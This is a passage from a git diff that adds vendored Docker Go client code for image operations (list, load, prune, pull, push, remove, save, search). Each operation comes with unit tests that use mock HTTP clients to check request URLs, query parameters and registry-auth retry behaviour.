filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + filters.Add("dangling", "true") + + listCases := []struct { + options types.ImageListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ImageListOptions{}, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": "", + }, + }, + { + options: types.ImageListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1":true,"label2":true}}`, + }, + }, + { + options: types.ImageListOptions{ + Filters: noDanglingfilters, + }, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]types.ImageSummary{ + { + ID: "image_id2", + }, + { + ID: "image_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + images, err := client.ImageList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(images) != 2 { + t.Fatalf("expected 2 images, got %v", images) + } + } +} + +func TestImageListApiBefore125(t *testing.T) { + expectedFilter := "image:tag" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + query := req.URL.Query() + actualFilter := query.Get("filter") + if actualFilter != expectedFilter { + return nil, fmt.Errorf("filter not set in URL query properly. Expected '%s', got %s", expectedFilter, actualFilter) + } + actualFilters := query.Get("filters") + if actualFilters != "" { + return nil, fmt.Errorf("filters should have not been present, were with value: %s", actualFilters) + } + content, err := json.Marshal([]types.ImageSummary{ + { + ID: "image_id2", + }, + { + ID: "image_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.24", + } + + filters := filters.NewArgs() + filters.Add("reference", "image:tag") + + options := types.ImageListOptions{ + Filters: filters, + } + + images, err := client.ImageList(context.Background(), options) + if err != nil { + t.Fatal(err) + } + if len(images) != 2 { + t.Fatalf("expected 2 images, got %v", images) + } +} diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go new file mode 100644 index 0000000000..77aaf1af36 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_load.go @@ -0,0 +1,30 @@ +package client + 
+import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ImageLoad loads an image in the docker host from the client host. +// It's up to the caller to close the io.ReadCloser in the +// ImageLoadResponse returned by this function. +func (cli *Client) ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) { + v := url.Values{} + v.Set("quiet", "0") + if quiet { + v.Set("quiet", "1") + } + headers := map[string][]string{"Content-Type": {"application/x-tar"}} + resp, err := cli.postRaw(ctx, "/images/load", v, input, headers) + if err != nil { + return types.ImageLoadResponse{}, err + } + return types.ImageLoadResponse{ + Body: resp.body, + JSON: resp.header.Get("Content-Type") == "application/json", + }, nil +} diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go new file mode 100644 index 0000000000..68dc14ff22 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_load_test.go @@ -0,0 +1,95 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestImageLoadError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageLoad(context.Background(), nil, true) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageLoad(t *testing.T) { + expectedURL := "/images/load" + expectedInput := "inputBody" + expectedOutput := "outputBody" + loadCases := []struct { + quiet bool + responseContentType string + expectedResponseJSON bool + expectedQueryParams map[string]string + }{ + { + quiet: false, + responseContentType: "text/plain", + expectedResponseJSON: false, + expectedQueryParams: map[string]string{ + "quiet": "0", + }, + 
}, + { + quiet: true, + responseContentType: "application/json", + expectedResponseJSON: true, + expectedQueryParams: map[string]string{ + "quiet": "1", + }, + }, + } + for _, loadCase := range loadCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + contentType := req.Header.Get("Content-Type") + if contentType != "application/x-tar" { + return nil, fmt.Errorf("content-type not set in URL headers properly. Expected 'application/x-tar', got %s", contentType) + } + query := req.URL.Query() + for key, expected := range loadCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + headers := http.Header{} + headers.Add("Content-Type", loadCase.responseContentType) + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + Header: headers, + }, nil + }), + } + + input := bytes.NewReader([]byte(expectedInput)) + imageLoadResponse, err := client.ImageLoad(context.Background(), input, loadCase.quiet) + if err != nil { + t.Fatal(err) + } + if imageLoadResponse.JSON != loadCase.expectedResponseJSON { + t.Fatalf("expected a JSON response, was not.") + } + body, err := ioutil.ReadAll(imageLoadResponse.Body) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected %s, got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go new file mode 100644 index 0000000000..5ef98b7f02 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// ImagesPrune requests the daemon to delete unused data +func (cli *Client) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (types.ImagesPruneReport, error) { + var report types.ImagesPruneReport + + if err := cli.NewVersionError("1.25", "image prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/images/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go new file mode 100644 index 0000000000..3bffdb70e8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_pull.go @@ -0,0 +1,46 @@ +package client + +import ( + "io" + "net/http" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" +) + +// ImagePull requests the docker host to pull an image from a remote registry. +// It executes the privileged function if the operation is unauthorized +// and it tries one more time. +// It's up to the caller to handle the io.ReadCloser and close it properly. 
+// +// FIXME(vdemeester): there is currently used in a few way in docker/docker +// - if not in trusted content, ref is used to pass the whole reference, and tag is empty +// - if in trusted content, ref is used to pass the reference name, and tag for the digest +func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) { + repository, tag, err := reference.Parse(ref) + if err != nil { + return nil, err + } + + query := url.Values{} + query.Set("fromImage", repository) + if tag != "" && !options.All { + query.Set("tag", tag) + } + + resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return nil, privilegeErr + } + resp, err = cli.tryImageCreate(ctx, query, newAuthHeader) + } + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go new file mode 100644 index 0000000000..fe6bafed97 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_pull_test.go @@ -0,0 +1,199 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImagePullReferenceParseError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, nil + }), + } + // An empty reference is an invalid reference + _, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{}) + if err == nil || err.Error() != "repository name must have at least one component" { + t.Fatalf("expected an error, got %v", err) + } +} + +func TestImagePullAnyError(t *testing.T) { + client := &Client{ + client: 
newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImagePullStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePullWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImagePullWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePullWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + 
if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth) + } + query := req.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != "myimage" { + return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", "myimage", fromImage) + } + tag := query.Get("tag") + if tag != "latest" { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", "latest", tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("hello world"))), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + resp, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != "hello world" { + t.Fatalf("expected 'hello world', got %s", string(body)) + } +} + +func TestImagePullWithoutErrors(t *testing.T) { + expectedURL := "/images/create" + expectedOutput := "hello world" + pullCases := []struct { + all bool + reference string + expectedImage string + expectedTag string + }{ + { + all: false, + reference: "myimage", + expectedImage: "myimage", + expectedTag: "latest", + }, + { + all: false, + reference: "myimage:tag", + expectedImage: "myimage", + expectedTag: "tag", + }, + { + all: true, + reference: "myimage", + expectedImage: "myimage", + expectedTag: "", + }, + { + all: true, + reference: "myimage:anything", + 
expectedImage: "myimage", + expectedTag: "", + }, + } + for _, pullCase := range pullCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != pullCase.expectedImage { + return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", pullCase.expectedImage, fromImage) + } + tag := query.Get("tag") + if tag != pullCase.expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", pullCase.expectedTag, tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + }, nil + }), + } + resp, err := client.ImagePull(context.Background(), pullCase.reference, types.ImagePullOptions{ + All: pullCase.all, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected '%s', got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go new file mode 100644 index 0000000000..8e73d28f56 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_push.go @@ -0,0 +1,54 @@ +package client + +import ( + "errors" + "io" + "net/http" + "net/url" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" +) + +// ImagePush requests the docker host to push an image to a remote registry. +// It executes the privileged function if the operation is unauthorized +// and it tries one more time. +// It's up to the caller to handle the io.ReadCloser and close it properly. 
+func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return nil, err + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return nil, errors.New("cannot push a digest reference") + } + + var tag = "" + if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged { + tag = nameTaggedRef.Tag() + } + + query := url.Values{} + query.Set("tag", tag) + + resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return nil, privilegeErr + } + resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader) + } + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryImagePush(ctx context.Context, imageID string, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/images/"+imageID+"/push", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go new file mode 100644 index 0000000000..b52da8b8dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_push_test.go @@ -0,0 +1,180 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImagePushReferenceError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, nil + }), + } + // An empty reference is an invalid reference + _, err := 
client.ImagePush(context.Background(), "", types.ImagePushOptions{}) + if err == nil || err.Error() != "repository name must have at least one component" { + t.Fatalf("expected an error, got %v", err) + } + // An canonical reference cannot be pushed + _, err = client.ImagePush(context.Background(), "repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", types.ImagePushOptions{}) + if err == nil || err.Error() != "cannot push a digest reference" { + t.Fatalf("expected an error, got %v", err) + } +} + +func TestImagePushAnyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImagePushStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePushWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImagePushWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: 
newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePushWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/myimage/push" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth) + } + query := req.URL.Query() + tag := query.Get("tag") + if tag != "tag" { + return nil, fmt.Errorf("tag not set in URL query properly. 
Expected '%s', got %s", "tag", tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("hello world"))), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + resp, err := client.ImagePush(context.Background(), "myimage:tag", types.ImagePushOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != "hello world" { + t.Fatalf("expected 'hello world', got %s", string(body)) + } +} + +func TestImagePushWithoutErrors(t *testing.T) { + expectedOutput := "hello world" + expectedURLFormat := "/images/%s/push" + pullCases := []struct { + reference string + expectedImage string + expectedTag string + }{ + { + reference: "myimage", + expectedImage: "myimage", + expectedTag: "", + }, + { + reference: "myimage:tag", + expectedImage: "myimage", + expectedTag: "tag", + }, + } + for _, pullCase := range pullCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + expectedURL := fmt.Sprintf(expectedURLFormat, pullCase.expectedImage) + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + tag := query.Get("tag") + if tag != pullCase.expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. 
Expected '%s', got %s", pullCase.expectedTag, tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + }, nil + }), + } + resp, err := client.ImagePush(context.Background(), pullCase.reference, types.ImagePushOptions{}) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected '%s', got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go new file mode 100644 index 0000000000..839e5311c4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_remove.go @@ -0,0 +1,31 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageRemove removes an image from the docker host. +func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) { + query := url.Values{} + + if options.Force { + query.Set("force", "1") + } + if !options.PruneChildren { + query.Set("noprune", "1") + } + + resp, err := cli.delete(ctx, "/images/"+imageID, query, nil) + if err != nil { + return nil, err + } + + var dels []types.ImageDelete + err = json.NewDecoder(resp.body).Decode(&dels) + ensureReaderClosed(resp) + return dels, err +} diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go new file mode 100644 index 0000000000..7b004f70e6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_remove_test.go @@ -0,0 +1,95 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageRemoveError(t *testing.T) { 
+ client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageRemove(t *testing.T) { + expectedURL := "/images/image_id" + removeCases := []struct { + force bool + pruneChildren bool + expectedQueryParams map[string]string + }{ + { + force: false, + pruneChildren: false, + expectedQueryParams: map[string]string{ + "force": "", + "noprune": "1", + }, + }, { + force: true, + pruneChildren: true, + expectedQueryParams: map[string]string{ + "force": "1", + "noprune": "", + }, + }, + } + for _, removeCase := range removeCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + query := req.URL.Query() + for key, expected := range removeCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + b, err := json.Marshal([]types.ImageDelete{ + { + Untagged: "image_id1", + }, + { + Deleted: "image_id", + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + imageDeletes, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{ + Force: removeCase.force, + PruneChildren: removeCase.pruneChildren, + }) + if err != nil { + t.Fatal(err) + } + if len(imageDeletes) != 2 { + t.Fatalf("expected 2 deleted images, got %v", imageDeletes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go new file mode 100644 index 0000000000..ecac880a32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_save.go @@ -0,0 +1,22 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" +) + +// ImageSave retrieves one or more images from the docker host as an io.ReadCloser. +// It's up to the caller to store the images and close the stream. 
+func (cli *Client) ImageSave(ctx context.Context, imageIDs []string) (io.ReadCloser, error) { + query := url.Values{ + "names": imageIDs, + } + + resp, err := cli.get(ctx, "/images/get", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go new file mode 100644 index 0000000000..8f0cf88640 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_save_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "testing" + + "golang.org/x/net/context" + + "strings" +) + +func TestImageSaveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageSave(context.Background(), []string{"nothing"}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageSave(t *testing.T) { + expectedURL := "/images/get" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + query := r.URL.Query() + names := query["names"] + expectedNames := []string{"image_id1", "image_id2"} + if !reflect.DeepEqual(names, expectedNames) { + return nil, fmt.Errorf("names not set in URL query properly. 
Expected %v, got %v", names, expectedNames) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + saveResponse, err := client.ImageSave(context.Background(), []string{"image_id1", "image_id2"}) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(saveResponse) + if err != nil { + t.Fatal(err) + } + saveResponse.Close() + if string(response) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(response)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go new file mode 100644 index 0000000000..b0fcd5c23d --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_search.go @@ -0,0 +1,51 @@ +package client + +import ( + "encoding/json" + "fmt" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// ImageSearch makes the docker host to search by a term in a remote registry. +// The list of results is not sorted in any fashion. 
+func (cli *Client) ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) { + var results []registry.SearchResult + query := url.Values{} + query.Set("term", term) + query.Set("limit", fmt.Sprintf("%d", options.Limit)) + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return results, err + } + query.Set("filters", filterJSON) + } + + resp, err := cli.tryImageSearch(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return results, privilegeErr + } + resp, err = cli.tryImageSearch(ctx, query, newAuthHeader) + } + if err != nil { + return results, err + } + + err = json.NewDecoder(resp.body).Decode(&results) + ensureReaderClosed(resp) + return results, err +} + +func (cli *Client) tryImageSearch(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.get(ctx, "/images/search", query, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go new file mode 100644 index 0000000000..b17bbd8343 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_search_test.go @@ -0,0 +1,165 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "encoding/json" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" +) + +func TestImageSearchAnyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageSearch(context.Background(), "some-image", 
types.ImageSearchOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageSearchStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImageSearchWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImageSearchWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImageSearchWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/search" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if 